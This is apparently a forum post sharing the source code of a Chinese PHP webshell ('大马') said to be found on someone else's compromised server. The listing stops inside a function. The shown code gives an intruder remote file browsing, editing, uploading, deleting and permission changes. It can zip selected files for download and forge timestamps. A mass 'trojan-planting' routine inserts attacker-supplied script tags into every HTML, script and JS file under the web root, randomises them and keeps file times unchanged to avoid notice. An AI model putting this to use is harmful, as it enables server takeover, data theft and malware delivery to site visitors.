php 大马

从别人的shell里面发现的
<?php

$password = "xiaoke";//设置密码

error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
set_time_limit(0);

function Root_GP(&$array)
{
	while(list($key,$var) = each($array))
	{
		if((strtoupper($key) != $key || \'\'.intval($key) == "$key") && $key != \'argc\' && $key != \'argv\')
		{
			if(is_string($var)) $array[$key] = stripslashes($var);
			if(is_array($var)) $array[$key] = Root_GP($var);  
		}
	}
	return $array;
}

function Root_CSS()
{
print<<<END
<style type="text/css">
	*{padding:0; margin:0;}
	body{background:threedface;font-family:"Verdana", "Tahoma", "宋体",sans-serif; font-size:13px;margin-top:3px;margin-bottom:3px;table-layout:fixed;word-break:break-all;}
	a{color:#000000;text-decoration:none;}
	a:hover{background:#BBBBBB;}
	table{color:#000000;font-family:"Verdana", "Tahoma", "宋体",sans-serif;font-size:13px;border:1px solid #999999;}
	td{background:#F9F6F4;}
	.toptd{background:threedface; width:310px; border-color:#FFFFFF #999999 #999999 #FFFFFF; border-style:solid;border-width:1px;}
	.msgbox{background:#FFFFE0;color:#FF0000;height:25px;font-size:12px;border:1px solid #999999;text-align:center;padding:3px;clear:both;}
	.actall{background:#F9F6F4;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
</style>\n
END;
return false;
}

//文件管理
class packdir
{
	var $out = \'\';
	var $datasec      = array();
	var $ctrl_dir     = array();
	var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
	var $old_offset   = 0;
	function packdir($array)
	{
		if(@function_exists(\'gzcompress\'))
		{
			for($n = 0;$n < count($array);$n++)
			{
				$array[$n] = urldecode($array[$n]);
				$fp = @fopen($array[$n], \'r\');
				$filecode = @fread($fp, @filesize($array[$n]));
				@fclose($fp);
				$this -> filezip($filecode,basename($array[$n]));
			}
			@closedir($zhizhen);
			$this->out = $this->packfile();
			return true;
		}
		return false;
	}
	function at($atunix = 0)
	{
		$unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
		if ($unixarr[\'year\'] < 1980)
		{
			$unixarr[\'year\']    = 1980;
			$unixarr[\'mon\']     = 1;
			$unixarr[\'mday\']    = 1;
			$unixarr[\'hours\']   = 0;
			$unixarr[\'minutes\'] = 0;
			$unixarr[\'seconds\'] = 0;
		} 
		return (($unixarr[\'year\'] - 1980) << 25) | ($unixarr[\'mon\'] << 21) | ($unixarr[\'mday\'] << 16) | ($unixarr[\'hours\'] << 11) | ($unixarr[\'minutes\'] << 5) | ($unixarr[\'seconds\'] >> 1);
	}
	function filezip($data, $name, $time = 0)
	{
		$name = str_replace(\'\\\', \'/\', $name);
		$dtime = dechex($this->at($time));
		$hexdtime	= \'\x\'.$dtime[6].$dtime[7].\'\x\'.$dtime[4].$dtime[5].\'\x\'.$dtime[2].$dtime[3].\'\x\'.$dtime[0].$dtime[1];
		eval(\'$hexdtime = "\' . $hexdtime . \'";\');
		$fr	= "\x50\x4b\x03\x04";
		$fr	.= "\x14\x00";
		$fr	.= "\x00\x00";
		$fr	.= "\x08\x00";
		$fr	.= $hexdtime;
		$unc_len = strlen($data);
		$crc = crc32($data);
		$zdata = gzcompress($data);
		$c_len = strlen($zdata);
		$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
		$fr .= pack(\'V\', $crc);
		$fr .= pack(\'V\', $c_len);
		$fr .= pack(\'V\', $unc_len);
		$fr .= pack(\'v\', strlen($name));
		$fr .= pack(\'v\', 0);
		$fr .= $name;
		$fr .= $zdata;
		$fr .= pack(\'V\', $crc);
		$fr .= pack(\'V\', $c_len);
		$fr .= pack(\'V\', $unc_len);
		$this -> datasec[] = $fr;
		$new_offset = strlen(implode(\'\', $this->datasec));
		$cdrec = "\x50\x4b\x01\x02";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x14\x00";
		$cdrec .= "\x00\x00";
		$cdrec .= "\x08\x00";
		$cdrec .= $hexdtime;
		$cdrec .= pack(\'V\', $crc);
		$cdrec .= pack(\'V\', $c_len);
		$cdrec .= pack(\'V\', $unc_len);
		$cdrec .= pack(\'v\', strlen($name) );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'v\', 0 );
		$cdrec .= pack(\'V\', 32 );
		$cdrec .= pack(\'V\', $this -> old_offset );
		$this -> old_offset = $new_offset;
		$cdrec .= $name;
		$this -> ctrl_dir[] = $cdrec;
	}
	function packfile()
	{
		$data    = implode(\'\', $this -> datasec);
		$ctrldir = implode(\'\', $this -> ctrl_dir);
		return $data.$ctrldir.$this -> eof_ctrl_dir.pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'v\', sizeof($this -> ctrl_dir)).pack(\'V\', strlen($ctrldir)).pack(\'V\', strlen($data))."\x00\x00";
	}
}

function File_Str($string)
{
	return str_replace(\'//\',\'/\',str_replace(\'\\\',\'/\',$string));
}

function File_Size($size)
{
	if($size > 1073741824) $size = round($size / 1073741824 * 100) / 100 . \' G\';
	elseif($size > 1048576) $size = round($size / 1048576 * 100) / 100 . \' M\';
	elseif($size > 1024) $size = round($size / 1024 * 100) / 100 . \' K\';
	else $size = $size . \' B\';
	return $size;
}

function File_Mode()
{
	$RealPath = realpath(\'./\');
	$SelfPath = $_SERVER[\'PHP_SELF\'];
	$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,\'/\'));
	return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}

function File_Read($filename)
{
	$handle = @fopen($filename,"rb");
	$filecode = @fread($handle,@filesize($filename));
	@fclose($handle);
	return $filecode;
}

function File_Write($filename,$filecode,$filemode)
{
	$key = true;
	$handle = @fopen($filename,$filemode);
	if(!@fwrite($handle,$filecode))
	{
		@chmod($filename,0666);
		$key = @fwrite($handle,$filecode) ? true : false;
	}
	@fclose($handle);
	return $key;
}

function File_Up($filea,$fileb)
{
	$key = @copy($filea,$fileb) ? true : false;
	if(!$key) $key = @move_uploaded_file($filea,$fileb) ? true : false;
	return $key;
}

function File_Down($filename)
{
	if(!file_exists($filename)) return false;
	$filedown = basename($filename);
	$array = explode(\'.\', $filedown);
	$arrayend = array_pop($array);
	header(\'Content-type: application/x-\'.$arrayend);
	header(\'Content-Disposition: attachment; filename=\'.$filedown);
	header(\'Content-Length: \'.filesize($filename));
	@readfile($filename);
	exit;
}

function File_Deltree($deldir)
{
	if(($mydir = @opendir($deldir)) == NULL) return false;	
	while(false !== ($file = @readdir($mydir)))
	{
		$name = File_Str($deldir.\'/\'.$file);
		if((is_dir($name)) && ($file!=\'.\') && ($file!=\'..\')){@chmod($name,0777);File_Deltree($name);}
		if(is_file($name)){@chmod($name,0777);@unlink($name);}
	} 
	@closedir($mydir);
	@chmod($deldir,0777);
	return @rmdir($deldir) ? true : false;
}

function File_Act($array,$actall,$inver)
{
	if(($count = count($array)) == 0) return \'请选择文件\';
	if($actall == \'e\')
	{
		$zip = new packdir;
		if($zip->packdir($array)){$spider = $zip->out;header("Content-type: application/unknown");header("Accept-Ranges: bytes");header("Content-length: ".strlen($spider));header("Content-disposition: attachment; filename=".$inver.";");echo $spider;exit;}
		return \'打包所选文件失败\';
	}
	$i = 0;
	while($i < $count)
	{
		$array[$i] = urldecode($array[$i]);
		switch($actall)
		{
			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return \'路径错误\'; $filename = array_pop(explode(\'/\',$array[$i])); @copy($array[$i],File_Str($inver.\'/\'.$filename)); $msg = \'复制到\'.$inver.\'目录\'; break;
			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = \'删除\'; break;
			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return \'属性值错误\'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = \'属性修改为\'.$inver; break;
			case "d" : @touch($array[$i],strtotime($inver)); $msg = \'修改时间为\'.$inver; break;
		}
		$i++;
	}
	return \'所选文件\'.$msg.\'完毕\';
}

function File_Edit($filepath,$filename,$dim = \'\')
{
	$THIS_DIR = urlencode($filepath);
	$THIS_FILE = File_Str($filepath.\'/\'.$filename);
	if(file_exists($THIS_FILE)){$FILE_TIME = @date(\'Y-m-d H:i:s\',filemtime($THIS_FILE));$FILE_CODE = htmlspecialchars(File_Read($THIS_FILE));}
	else {$FILE_TIME = @date(\'Y-m-d H:i:s\',time());$FILE_CODE = \'\';}
print<<<END
<script language="javascript">
var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
	var txt, i, found;
	if(str == "")return false;
	if(NS4){
		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
		if(n == 0) alert(str + " ... Not-Find")
	}
	if(IE4){
		txt = win.document.body.createTextRange();
		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
			txt.moveStart("character", 1);
			txt.moveEnd("textedit")
		}
		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
	}
	return false
}
function CheckDate(){
	var re = document.getElementById(\'mtime\').value;
	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
	var r = re.match(reg);
	if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
	else{document.getElementById(\'editor\').submit();}
}
</script>
<div class="actall">查找内容: <input name="searchs" type="text" value="{$dim}" style="width:500px;">
<input type="button" value="查找" onclick="search(searchs.value)"></div>
<form method="POST" id="editor" action="?s=a&p={$THIS_DIR}">
<div class="actall"><input type="text" name="pfn" value="{$THIS_FILE}" style="width:750px;"></div>
<div class="actall"><textarea name="pfc" id style="width:750px;height:380px;">{$FILE_CODE}</textarea></div>
<div class="actall">文件修改时间 <input type="text" name="mtime" id="mtime" value="{$FILE_TIME}" style="width:150px;"></div>
<div class="actall"><input type="button" value="保存" onclick="CheckDate();" style="width:80px;">
<input type="button" value="返回" onclick="window.location=\'?s=a&p={$THIS_DIR}\';" style="width:80px;"></div>
</form>
END;
}

function File_Soup($p)
{
	$THIS_DIR = urlencode($p);
	$UP_SIZE = get_cfg_var(\'upload_max_filesize\');
	$MSG_BOX = \'单个附件允许大小:\'.$UP_SIZE.\', 改名格式(new.php),如为空,则保持原文件名.\';
	if(!empty($_POST[\'updir\']))
	{
		if(count($_FILES[\'soup\']) >= 1)
		{
			$i = 0;
			foreach ($_FILES[\'soup\'][\'error\'] as $key => $error)
			{
				if ($error == UPLOAD_ERR_OK)
				{
					$souptmp = $_FILES[\'soup\'][\'tmp_name\'][$key];
					if(!empty($_POST[\'reup\'][$i]))$soupname = $_POST[\'reup\'][$i]; else $soupname = $_FILES[\'soup\'][\'name\'][$key];
					$MSG[$i] = File_Up($souptmp,File_Str($_POST[\'updir\'].\'/\'.$soupname)) ? $soupname.\'上传成功\' : $soupname.\'上传失败\';
				}
				$i++;
			}
		}
		else
		{
			$MSG_BOX = \'请选择文件\';
		}
	}
print<<<END
<div class="msgbox">{$MSG_BOX}</div>
<form method="POST" id="editor" action="?s=q&p={$THIS_DIR}" enctype="multipart/form-data">
<div class="actall">上传到目录: <input type="text" name="updir" value="{$p}" style="width:531px;height:22px;"></div>
<div class="actall">附件1 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[0] </div>
<div class="actall">附件2 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[1] </div>
<div class="actall">附件3 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[2] </div>
<div class="actall">附件4 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[3] </div>
<div class="actall">附件5 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[4] </div>
<div class="actall">附件6 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[5] </div>
<div class="actall">附件7 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[6] </div>
<div class="actall">附件8 <input type="file" name="soup[]" style="width:300px;height:22px;"> 改名 <input type="text" name="reup[]" style="width:130px;height:22px;"> $MSG[7] </div>
<div class="actall"><input type="submit" value="上传" style="width:80px;"> <input type="button" value="返回" onclick="window.location=\'?s=a&p={$THIS_DIR}\';" style="width:80px;"></div>
</form>
END;
}

function File_a($p)
{
	if(!$_SERVER[\'SERVER_NAME\']) $GETURL = \'\'; else $GETURL = \'http://\'.$_SERVER[\'SERVER_NAME\'].\'/\';
	$MSG_BOX = \'等待消息队列\';
	$UP_DIR = urlencode(File_Str($p.\'/..\'));
	$REAL_DIR = File_Str(realpath($p));
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
	$THIS_DIR = urlencode(File_Str($REAL_DIR));
	$NUM_D = 0;
	$NUM_F = 0;
	if(!empty($_POST[\'pfn\'])){$intime = @strtotime($_POST[\'mtime\']);$MSG_BOX = File_Write($_POST[\'pfn\'],$_POST[\'pfc\'],\'wb\') ? \'编辑文件 \'.$_POST[\'pfn\'].\' 成功\' : \'编辑文件 \'.$_POST[\'pfn\'].\' 失败\';@touch($_POST[\'pfn\'],$intime);}
	if(!empty($_FILES[\'ufp\'][\'name\'])){if($_POST[\'ufn\'] != \'\') $upfilename = $_POST[\'ufn\']; else $upfilename = $_FILES[\'ufp\'][\'name\'];$MSG_BOX = File_Up($_FILES[\'ufp\'][\'tmp_name\'],File_Str($REAL_DIR.\'/\'.$upfilename)) ? \'上传文件 \'.$upfilename.\' 成功\' : \'上传文件 \'.$upfilename.\' 失败\';}
	if(!empty($_POST[\'actall\'])){$MSG_BOX = File_Act($_POST[\'files\'],$_POST[\'actall\'],$_POST[\'inver\']);}
	if(isset($_GET[\'md\'])){$modfile = File_Str($REAL_DIR.\'/\'.$_GET[\'mk\']); if(!eregi("^[0-7]{4}$",$_GET[\'md\'])) $MSG_BOX = \'属性值错误\'; else $MSG_BOX = @chmod($modfile,base_convert($_GET[\'md\'],8,10)) ? \'修改 \'.$modfile.\' 属性为 \'.$_GET[\'md\'].\' 成功\' : \'修改 \'.$modfile.\' 属性为 \'.$_GET[\'md\'].\' 失败\';}
	if(isset($_GET[\'mn\'])){$MSG_BOX = @rename(File_Str($REAL_DIR.\'/\'.$_GET[\'mn\']),File_Str($REAL_DIR.\'/\'.$_GET[\'rn\'])) ? \'改名 \'.$_GET[\'mn\'].\' 为 \'.$_GET[\'rn\'].\' 成功\' : \'改名 \'.$_GET[\'mn\'].\' 为 \'.$_GET[\'rn\'].\' 失败\';}
	if(isset($_GET[\'dn\'])){$MSG_BOX = @mkdir(File_Str($REAL_DIR.\'/\'.$_GET[\'dn\']),0777) ? \'创建目录 \'.$_GET[\'dn\'].\' 成功\' : \'创建目录 \'.$_GET[\'dn\'].\' 失败\';}
	if(isset($_GET[\'dd\'])){$MSG_BOX = File_Deltree($_GET[\'dd\']) ? \'删除目录 \'.$_GET[\'dd\'].\' 成功\' : \'删除目录 \'.$_GET[\'dd\'].\' 失败\';}
	if(isset($_GET[\'df\'])){if(!File_Down($_GET[\'df\'])) $MSG_BOX = \'下载文件不存在\';}
	Root_CSS();
print<<<END
<script type="text/javascript">
	function Inputok(msg,gourl)
	{
		smsg = "当前文件:[" + msg + "]";
		re = prompt(smsg,unescape(msg));
		if(re)
		{
			var url = gourl + escape(re);
			window.location = url;
		}
	}
	function Delok(msg,gourl)
	{
		smsg = "确定要删除[" + unescape(msg) + "]吗?";
		if(confirm(smsg))
		{
			if(gourl == \'b\')
			{
				document.getElementById(\'actall\').value = escape(gourl);
				document.getElementById(\'fileall\').submit();
			}
			else window.location = gourl;
		}
	}
	function CheckDate(msg,gourl)
	{
		smsg = "当前文件时间:[" + msg + "]";
		re = prompt(smsg,msg);
		if(re)
		{
			var url = gourl + re;
			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
			var r = re.match(reg);
			if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
		}
	}
	function CheckAll(form)
	{
		for(var i=0;i<form.elements.length;i++)
		{
			var e = form.elements[i];
			if (e.name != \'chkall\')
			e.checked = form.chkall.checked;
		}
	}
	function SubmitUrl(msg,txt,actid)
	{
		re = prompt(msg,unescape(txt));
		if(re)
		{
			document.getElementById(\'actall\').value = actid;
			document.getElementById(\'inver\').value = escape(re);
			document.getElementById(\'fileall\').submit();
		}
	}
</script>
	<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
	<div class="actall" style="text-align:center;padding:3px;">
	<form method="GET"><input type="hidden" id="s" name="s" value="a">
	<input type="text" name="p" value="{$REAL_DIR}" style="width:550px;height:22px;">
	<select onchange="location.href=\'?s=a&p=\'+options[selectedIndex].value">
	<option>---特殊目录---</option>
	<option value="{$ROOT_DIR}"> 网站根目录 </option>
	<option value="{$FILE_DIR}"> 本程序目录 </option>
	<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动"> 所有组启动项 </option>
	<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup"> 英文启动项 </option>
	<option value="C:/RECYCLER"> RECYCLER </option>
	<option value="C:/Program Files"> Program Files </option>
	</select> <input type="submit" value="转到" style="width:50px;"></form>
	<div style="margin-top:3px;"></div>
	<form method="POST" action="?s=a&p={$THIS_DIR}" enctype="multipart/form-data">
	<input type="button" value="新建文件" onclick="Inputok(\'newfile.php\',\'?s=p&fp={$THIS_DIR}&fn=\');">
	<input type="button" value="新建目录" onclick="Inputok(\'newdir\',\'?s=a&p={$THIS_DIR}&dn=\');"> 
	<input type="button" value="批量上传" onclick="window.location=\'?s=q&p={$REAL_DIR}\';"> 
	<input type="file" name="ufp" style="width:300px;height:22px;">
	<input type="text" name="ufn" style="width:121px;height:22px;">
	<input type="submit" value="上传" style="width:50px;">
	</form>
	</div>
	<form method="POST" name="fileall" id="fileall" action="?s=a&p={$THIS_DIR}">
	<table border="0"><tr>
	<td class="toptd" style="width:450px;"> <a href="?s=a&p={$UP_DIR}"><b>上级目录</b></a> </td>
	<td class="toptd" style="width:80px;"> 操作 </td>
	<td class="toptd" style="width:48px;"> 属性 </td>
	<td class="toptd" style="width:173px;"> 修改时间 </td>
	<td class="toptd" style="width:75px;"> 大小 </td></tr>
END;
	if(($h_d = @opendir($p)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' or $Filename == \'..\') continue;
		$Filepath = File_Str($REAL_DIR.\'/\'.$Filename);
		if(is_dir($Filepath))
		{
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
			$Filepath = urlencode($Filepath);
			echo "\r\n".\' <tr><td> <a href="?s=a&p=\'.$Filepath.\'"><font face="wingdings" size="3">0</font><b> \'.$Filename.\' </b></a> </td> \';
			$Filename = urlencode($Filename);
			echo \' <td> <a href="#" onclick="Delok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&dd=\'.$Filename.\'\\');return false;"> 删除 </a> \';
			echo \' <a href="#" onclick="Inputok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mn=\'.$Filename.\'&rn=\\');return false;"> 改名 </a> </td> \';
			echo \' <td> <a href="#" onclick="Inputok(\\'\'.$Fileperm.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mk=\'.$Filename.\'&md=\\');return false;"> \'.$Fileperm.\' </a> </td> \';
			echo \' <td>\'.$Filetime.\'</td> \';
			echo \' <td> </td> </tr>\'."\r\n";
			$NUM_D++;
		}
	}
	@rewinddir($h_d);
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' or $Filename == \'..\') continue;
		$Filepath = File_Str($REAL_DIR.\'/\'.$Filename);
		if(!is_dir($Filepath))
		{
			$Fileurls = str_replace(File_Str($ROOT_DIR.\'/\'),$GETURL,$Filepath);
			$Fileperm = substr(base_convert(@fileperms($Filepath),10,8),-4);
			$Filetime = @date(\'Y-m-d H:i:s\',@filemtime($Filepath));
			$Filesize = File_Size(@filesize($Filepath));
			if($Filepath == File_Str(__FILE__)) $fname = \'<font color="#8B0000">\'.$Filename.\'</font>\'; else $fname = $Filename;
			echo "\r\n".\' <tr><td> <input type="checkbox" name="files[]" value="\'.urlencode($Filepath).\'"><a target="_blank" href="\'.$Fileurls.\'">\'.$fname.\'</a> </td>\';
			$Filepath = urlencode($Filepath);
			$Filename = urlencode($Filename);
			echo \' <td> <a href="?s=p&fp=\'.$THIS_DIR.\'&fn=\'.$Filename.\'"> 编辑 </a> \';
			echo \' <a href="#" onclick="Inputok(\\'\'.$Filename.\'\\',\\'?s=a&p=\'.$THIS_DIR.\'&mn=\'.$Filename.\'&rn=\\');return false;"> 改名 </a> </td>\';
			echo \' <td>\'.$Fileperm.\'</td> \';
			echo \' <td>\'.$Filetime.\'</td> \';
			echo \' <td align="right"> <a href="?s=a&df=\'.$Filepath.\'">\'.$Filesize.\'</a> </td></tr> \'."\r\n";
			$NUM_F++;
		}
	}
	@closedir($h_d);
	if(!$Filetime) $Filetime = \'2009-01-01 00:00:00\';
print<<<END
</table>
<div class="actall"> <input type="hidden" id="actall" name="actall" value="undefined"> 
<input type="hidden" id="inver" name="inver" value="undefined"> 
<input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"> 
<input type="button" value="复制" onclick="SubmitUrl(\'复制所选文件到路径: \',\'{$THIS_DIR}\',\'a\');return false;"> 
<input type="button" value="删除" onclick="Delok(\'所选文件\',\'b\');return false;"> 
<input type="button" value="属性" onclick="SubmitUrl(\'修改所选文件属性值为: \',\'0666\',\'c\');return false;"> 
<input type="button" value="时间" onclick="CheckDate(\'{$Filetime}\',\'d\');return false;"> 
<input type="button" value="打包" onclick="SubmitUrl(\'打包并下载所选文件下载名为: \',\'spider.tar.gz\',\'e\');return false;"> 
目录({$NUM_D}) / 文件({$NUM_F})</div> 
</form> 
END;
	return true;
}

//批量挂马
function Guama_Pass($length)
{
	$possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
	$str = "";
	while(strlen($str) < $length) $str .= substr($possible,(rand() % strlen($possible)),1);
	return $str;
}

function Guama_Make($codea,$codeb,$codec)
{
	return str_replace($codea,Guama_Pass($codeb),$codec);
}

function Guama_Auto($gp,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb)
{
	if(($h_d = @opendir($gp)) == NULL) return false;
	if($gm > 12) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		if($gl != \'\'){if(eregi($gl,$Filename)) continue;}
		$Filepath = File_Str($gp.\'/\'.$Filename);
		if(is_dir($Filepath) && $gb) Guama_Auto($Filepath,$gt,$gl,$gc,$gm,$gf,$gi,$gk,$gd,$gb);
		if(eregi($gt,$Filename))
		{
			$fc = File_Read($Filepath);
			if(($gk != \'\') && (stristr($fc,chop($gk)))) continue;
			if(($gf != \'\') && ($gm != 0)) $gcm = Guama_Make($gf,$gm,$gc); else $gcm = $gc;
			if($gd) $ftime = @filemtime($Filepath);
			if($gi == \'a\'){if(!stristr($fc,\'</head>\')) continue; $fcm = str_replace(\'</head>\',"\r\n".$gcm."\r\n".\'</head>\',$fc); $fcm = str_replace(\'</HEAD>\',"\r\n".$gcm."\r\n".\'</HEAD>\',$fcm);}
			if($gi == \'b\') $fcm = $gcm."\r\n".$fc;
			if($gi == \'c\') $fcm = $fc."\r\n".$gcm;
			echo File_Write($Filepath,$fcm,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($gd) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Guama_b()
{
	if((!empty($_POST[\'gp\'])) && (!empty($_POST[\'gt\'])) && (!empty($_POST[\'gc\'])))
	{
		echo \'<div class="actall">\';
		$_POST[\'gt\'] = str_replace(\'.\',\'\\.\',$_POST[\'gt\']);
		if($_POST[\'inout\'] == \'a\') $_POST[\'gl\'] = str_replace(\'.\',\'\\.\',$_POST[\'gl\']); else $_POST[\'gl\'] = \'\';
		if(stristr($_POST[\'gc\'],\'[-\') && stristr($_POST[\'gc\'],\'-]\'))
		{
			$temp = explode(\'[-\',$_POST[\'gc\']);
			$gk = $temp[0];
			preg_match_all("/\[\-([^~]*?)\-\]/i",$_POST[\'gc\'],$nc);
			if(!eregi("^[0-9]{1,2}$",$nc[1][0])){echo \'<a href="#" onclick="history.back();">异常终止</a>\'; return false;}
			$gm = (int)$nc[1][0];
			$gf = $nc[0][0];
		}
		else
		{
			$gk = $_POST[\'gc\'];
			$gm = 0;
			$gf = \'\';
		}
		if(!isset($_POST[\'gx\'])) $gk = \'\';
		$gd = isset($_POST[\'gd\']) ? true : false;
		$gb = ($_POST[\'gb\'] == \'a\') ? true : false;
		echo Guama_Auto($_POST[\'gp\'],$_POST[\'gt\'],$_POST[\'gl\'],$_POST[\'gc\'],$gm,$gf,$_POST[\'gi\'],$gk,$gd,$gb) ? \'<a href="#" onclick="history.back();">挂马完毕</a>\' : \'<a href="#" onclick="history.back();">异常终止</a>\';
		echo \'</div>\';
		return false;
	}
	$FILE_DIR = File_Str(dirname(__FILE__));
	$ROOT_DIR = File_Mode();
print<<<END
<script language="javascript">
function Fulll(i)
{
	if(i==0) return false;
  Str = new Array(5);
  if(i <= 2){Str[1] = "{$ROOT_DIR}";Str[2] = "{$FILE_DIR}";sform.gp.value = Str[i];}
  else{Str[3] = ".htm|.html|.shtml";Str[4] = ".htm|.html|.shtml|.asp|.php|.jsp|.cgi|.aspx|.do";Str[5] = ".js";sform.gt.value = Str[i];}
  return true;
}
function autorun()
{
	if(document.getElementById(\'gp\').value == \'\'){alert(\'挂马路径不能为空\');return false;}
	if(document.getElementById(\'gt\').value == \'\'){alert(\'文件类型不能为空\');return false;}
	if(document.getElementById(\'gc\').value == \'\'){alert(\'挂马代码不能为空\');return false;}
	document.getElementById(\'sform\').submit();
}
</script>
<form method="POST" name="sform" id="sform" action="?s=b">
<div class="actall" style="height:35px;">挂马路径 <input type="text" name="gp" id="gp" value="{$ROOT_DIR}" style="width:500px;">
<select onchange=\'return Fulll(options[selectedIndex].value)\'>
<option value="0" selected>--范围选择--</option>
<option value="1">网站跟目录</option>
<option value="2">本程序目录</option>
</select></div>
<div class="actall" style="height:35px;">文件类型 <input type="text" name="gt" id="gt" value=".htm|.html|.shtml" style="width:500px;">
<select onchange=\'return Fulll(options[selectedIndex].value)\'>
<option value="0" selected>--类型选择--</option>
<option value="3">静态文件</option>
<option value="4">脚本静态</option>
<option value="5">JS文件</option>
</select></div>
<div class="actall" style="height:35px;">过滤对象 <input type="text" name="gl" value="templet|templets|default|editor|fckeditor.html" style="width:500px;" disabled>
<input type="radio" name="inout" value="a" onclick="gl.disabled=false;">开启 <input type="radio" name="inout" value="b" onclick="gl.disabled=true;" checked>关闭</div>
<div class="actall">挂马代码 <textarea name="gc" id="gc" style="width:610px;height:180px;"><script language=javascript src="http://www.baidu.com/ad.js?[-6-]"></script></textarea>
<div class="msgbox">挂马变形说明: 程序自动寻找[-6-]标签,替换为随机字符,6表示六位随机字符,最大12位,如果不变形可以不加[-6-]标签.
<br>挂上示例: <script language=javascript src="http://www.baidu.com/ad.js?EMTDSU"></script></div></div>
<div class="actall" style="height:35px;"><input type="radio" name="gi" value="a" checked>插入</head>标签之前 
<input type="radio" name="gi" value="b">插入文件最顶端 
<input type="radio" name="gi" value="c">插入文件最末尾</div>
<div class="actall" style="height:30px;"><input type="checkbox" name="gx" value="1" checked>智能过滤重复代码 <input type="checkbox" name="gd" value="1" checked>保持文件修改时间不变</div>
<div class="actall" style="height:50px;"><input type="radio" name="gb" value="a" checked>将挂马应用于该文件夹,子文件夹和文件
<br><input type="radio" name="gb" value="b">仅将挂马应用于该文件夹</div>
<div class="actall"><input type="button" value="开始挂马" style="width:80px;height:26px;" onclick="autorun();"></div>
</form>
END;
return true;
}

//批量清马

function Qingma_Auto($qp,$qt,$qc,$qd,$qb)
{
	if(($h_d = @opendir($qp)) == NULL) return false;
	while(false !== ($Filename = @readdir($h_d)))
	{
		if($Filename == \'.\' || $Filename == \'..\') continue;
		$Filepath = File_Str($qp.\'/\'.$Filename);
		if(is_dir($Filepath) && $qb) Qingma_Auto($Filepath,$qt,$qc,$qd,$qb);
		if(eregi($qt,$Filename))
		{
			$ic = File_Read($Filepath);
			if(!stristr($ic,$qc)) continue;
			$ic = str_replace($qc,\'\',$ic);
			if($qd) $ftime = @filemtime($Filepath);
			echo File_Write($Filepath,$ic,\'wb\') ? \'<font color="#006600">成功:</font>\'.$Filepath.\' <br>\'."\r\n" : \'<font color="#FF0000">失败:</font>\'.$Filepath.\' <br>\'."\r\n";
			if($qd) @touch($Filepath,$ftime);
			ob_flush();
			flush();
		}
	}
	@closedir($h_d);
	return true;
}

function Qingma_c()
{
